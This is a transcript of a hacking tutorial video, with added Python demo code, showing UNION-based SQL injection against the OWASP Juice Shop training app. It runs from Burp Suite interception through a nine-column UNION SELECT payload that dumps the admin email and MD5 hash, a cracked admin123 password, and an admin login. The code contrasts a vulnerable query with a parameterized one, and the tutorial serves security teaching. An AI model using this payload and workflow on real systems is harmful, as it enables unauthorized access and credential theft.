Advanced SQL Injection Tutorial! Learn From A Pro Hacker Now!

Captions
Welcome back to another episode on how to hack. Today we'll be learning about hacking into databases and finally being able to pull out all the critical sensitive data like usernames, passwords, and the list goes on, and this is using a slightly more advanced method in Structured Query Language injection, SQL injection. So right in front of us I have Open Web Application Security Project Juice Shop running. This is a vulnerable web application system for us to run all of our hacking techniques on. And once more, big disclaimer, all right: hacking is illegal. If you want to do it, do it either in your own home lab environment or check out those bug bounty programs that are available for all these websites that you would like to test on. Make sure that they've got a legitimate bug bounty program, else you may end up crashing someone's website application or even dropping a table, which is absolutely horrendous, okay? So make sure you check on that first.

So going back to the tutorial, here I have the Juice Shop. This is an e-commerce site and there are all these different products: we have Apple Juice, Apple Pomace, Banana Juice, and the list goes on. So I can go to the top right corner, click on the settings, click on Web Developer and click on the Network tab. This will bring up the Network tab for us, and I can see right here, I can do a refresh and we can see all the calls that are being made into the website. This is important, because if we want to understand the structure of the website, how all the different calls are made and how we're going to be able to run all our tests and all our payloads, this is going to be one of those places that you want to look out for, on top of the URL, the search function and so on. So of course if I scroll down you can see here we have different kinds of files that got downloaded: we have main-es2015.js, so JavaScript, all right, and so on, and we have of course api/challenges. API stands for application programming interface, so we're going to be able to interact with them. And of course if I scroll down further we have api/quantities and we have search. So I can click under search and you can see right here, okay, on the bottom right side we have GET, all right, followed by the URL. Of course in the real world you'll be going after a specific domain name, all right, and then of course specific port numbers if any, else it will default into either HTTP or HTTPS. And right at the back you can see here we have a question mark, q equals, okay? So this is the part where you can inject any of your searches into, and through REST, right, so REST stands for representation of state transfer, and then once you do that we'll be able to pick up that information and so on.

So at the top right corner click on FoxyProxy, click on Burp Suite, so we'll turn on our proxy to intercept our request. Now I can go to the top left corner and I can click on Terminal. Once I'm on the terminal I can go ahead and turn on Burp Suite, so let's go ahead and enter burpsuite, all right, and start this up. So now we're starting our Burp Suite Community Edition, okay, so we have here Community Edition right here, click Next and click Start Burp using Burp defaults. Burp Suite is going to be our interceptor where we can manipulate the data, change the information and then amend those details and send it over to the site to see if there are any Structured Query Language vulnerabilities. These are openings for us to hijack into the system. So now I can go under the Proxy tab and ensure that Intercept is on, okay? So what I can do now is go back and do a refresh. All right, so here we go, the following: this is an interception, GET slash, so we'll follow that: socket.io, rest admin application configuration, api challenges, rest languages, api challenges again, rest admin application configuration, quantities, okay, and this is the one that we're targeting today: we have GET /rest/product/search. So do a right-click on this and send it over to Repeater.

Now I click on the Repeater tab and you can see here on the left side we have the request, in the center we have the response, and on the far right side we have Inspector. This is a wonderful way for us to actually launch our attacks and know and understand what kind of responses are coming back from the server or from the system. So here on the left side I can go ahead and enter a particular value, right, so in this case in search, question mark q equals, I can enter apple, and let's go ahead and send and see what happens. I'll click Send and we can see over here we got a response, HTTP/1.1 200 OK, and if I scroll down further we can see here status success and we got a couple of items: we got id 1, we got Apple Juice, okay, and of course we've got id 24, Apple Pomace. So we got two items being returned as a result of the search. This is a critical part of any penetration testing: we're trying to find what is considered normal, what is the logical behavior of a website whenever we do a normal search, so we get back results, and we want to also understand right down to the field. In this case in the result section we can see here this is a return of JavaScript Object Notation, JSON, all right. So you have status success, we have data, and here we have id, name, description, price, deluxePrice, image, createdAt, updatedAt and deletedAt. So what does all this mean, all right? We have one, two, three, four, five, six, seven, eight, nine, so we got nine results coming out from this JSON. What it means for us is that whenever we're doing any kind of search query function and we found a vulnerability and we want to pull data out of the system, we have to ensure that whatever we are returning is going to fit into those nine columns, okay, and of course if it doesn't fit into nine columns then we'll get an error.

So here, okay, we have done all sorts of testing, and you can do all this testing using Intruder as a function to check for vulnerabilities, particularly in the area of SQL injection, where you have a list of payloads and from the list of payloads you can easily send them over to the web application system to find those vulnerabilities. So we got a couple of payloads here, and the first part is the idea about what we're trying to inject: we're trying to UNION the table by combining and joining tables so that when we return the result we can actually get back values of another table. Of course at the bottom you can see here I have UNION, all right, and then we have SELECT id, email, password followed by 4, 5, 6, 7, 8, 9, so exactly what I mentioned earlier, which is the whole idea about ensuring that whatever is returned from the UNION table can fit right back into the nine columns. So if I copy this right here, I do a right-click, copy, and I go back into Burp Suite, what I can do now is change the query parameter value of q. Double-click on this and I can change the value over here, so this is the payload that we have created, click Apply changes, all right, so we have the changes now being applied. What I can do now is go ahead and click Send, in three, two, one, click Send, and we got the following feedback. That's it, all right, by the way, that's it, it's game over, we are in, we got all the details and all of the results right here. This is really, really scary stuff, because very quickly we're able to uncover all these different details. As I scroll down further, the first part is Apple Juice, the second part is admin, this is literally an admin account over here, and of course if you go back into the UNION SELECT you can see id, email and password. So the first field is id 1, the name, which is the email field, and the description is actually the password. So in this case we got admin, all right, so this is the email address, so I can do a right-click and I can copy this, all right, and we can paste it back into, say, Mousepad, all right, so I can paste it over here.

Of course going back to Burp Suite we got the password value here, and I can do a right-click, I can copy this, and I can go back into Mousepad and I can paste this hash value here. So without even doing any kind of technical analysis I'm able to understand that this is a hash value, and what I can do now is do a copy of this hash value, I go into any of your browsers, any of your favorite browser, whichever the case is, I turn off Burp Suite, all right, I turn off FoxyProxy, I go to any search engine and all I've got to do now is just paste the hash value over here, click Google Search, and immediately on the first result, md5.grommet.com. So go ahead and click on it and right here we got the following, okay, convert a string, all right, to an MD5 hash, and this is the password right here: admin123, all right. So this is the value that we've inserted, we reverse it and we got back admin123 as the password. So how can we ascertain this, right, how can we confirm that we truly got the username and password? Go back to OWASP Juice Shop, all right, I'll close the Network tab, click on Account, click Login, and now all I've got to do is go ahead and enter, okay, in this case we got over here, right, admin123 is the password, so I can copy the email address, go back to the login screen, okay, paste it right here, go back to Mousepad and now I can copy the password value, I can go ahead and copy this, go back to OWASP Juice Shop, or any of those websites, and click Login. Oh my goodness, we are in! Look at the top right corner right here, admin at juice shop, so we are in, we get full control of the entire user profile: we can change the username, we can change the email address, we can change the password field, we can change all of those things.

So really quickly you are able now to actually see all these different kinds of hacking techniques and how we can join multiple tables together, because the first table that you're targeting is actually the product table, but what we're trying to find out is: are there any other sensitive tables, say for example the user table, the other tables that may contain personal information, credit card details, financial transaction records, and the list goes on. It's important, of course, if you're storing all these different kinds of sensitive data, you want to ensure that your encryption keys and your hash values are also being salted. This is a key way of separation of duty, to make it a lot harder for hackers to break directly into a database if there's a vulnerability at the application layer. So once again I hope you've learned something valuable in today's tutorial, and if you have any questions feel free to leave a comment below and I'll try my best to answer any of your questions. Remember, like, share, subscribe and turn on notifications so that you can be kept abreast of the latest cyber security tutorials. Thanks so much once again for watching.
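As an added example (not code from the video, and not Juice Shop's own source), here is a toy model of the search endpoint in Python on an in-memory SQLite database: the string-concatenated query that the nine-column UNION payload exploits, beside the parameter-bound version that turns the same input into a harmless search term. The table layout, the sample rows and the `leaked_credentials` helper are constructed assumptions for the demo.

```python
import hashlib
import sqlite3

# Constructed stand-in for the two tables the video touches: the nine-column
# Products table behind /rest/product/search and the Users table it UNIONs in.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE Products (id INTEGER, name TEXT, description TEXT, price REAL,
            deluxePrice REAL, image TEXT, createdAt TEXT, updatedAt TEXT, deletedAt TEXT);
        CREATE TABLE Users (id INTEGER, email TEXT, password TEXT);
        INSERT INTO Products VALUES (1, 'Apple Juice', 'Fresh juice', 1.99, 1.49,
            'apple.jpg', '2021-06-26', '2021-06-26', NULL);
        INSERT INTO Products VALUES (24, 'Apple Pomace', 'Dried pulp', 0.89, 0.79,
            'pomace.jpg', '2021-06-26', '2021-06-26', NULL);
    """)
    # Unsalted MD5, like the hash the video reverses with a lookup site (sample row).
    db.execute("INSERT INTO Users VALUES (1, 'admin@juice-sh.op', ?)",
               (hashlib.md5(b"admin123").hexdigest(),))
    return db

# The payload the video pastes into q: a UNION that pads Users' three columns
# out to the nine the product query returns, then comments out the trailing quote.
PAYLOAD = "' UNION SELECT id, email, password, 4, 5, 6, 7, 8, 9 FROM Users--"

def search_vulnerable(db, q):
    # String concatenation: q is spliced into the SQL text, so a UNION inside q runs.
    sql = f"SELECT * FROM Products WHERE name LIKE '%{q}%'"
    return db.execute(sql).fetchall()

def search_hardened(db, q):
    # Parameter binding: q travels as a bound value, so it can only be matched, never parsed.
    sql = "SELECT * FROM Products WHERE name LIKE ?"
    return db.execute(sql, (f"%{q}%",)).fetchall()

def leaked_credentials(rows):
    # A row whose 'name' slot holds an email address came from Users, not Products.
    return [(r[1], r[2]) for r in rows if "@" in str(r[1])]

if __name__ == "__main__":
    db = build_db()
    print("normal search:", [r[1] for r in search_vulnerable(db, "apple")])
    print("vulnerable + payload:", leaked_credentials(search_vulnerable(db, PAYLOAD)))
    print("hardened + payload:", search_hardened(db, PAYLOAD))
```

A payload with fewer or more than nine SELECT items makes `search_vulnerable` raise `sqlite3.OperationalError` (column-count mismatch), which is the error the video alludes to; the hardened version never reaches that code path.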
Info
Channel: Loi Liang Yang
Views: 36,343
Keywords: hacker, hacking, cracker, cracking, kali linux, kali, metasploit, ethical hacking, ethical hacker, penetration testing, penetration tester, owasp, sqli
Id: lkOBvy4bRr4
Length: 10min 16sec (616 seconds)
Published: Sat Jun 26 2021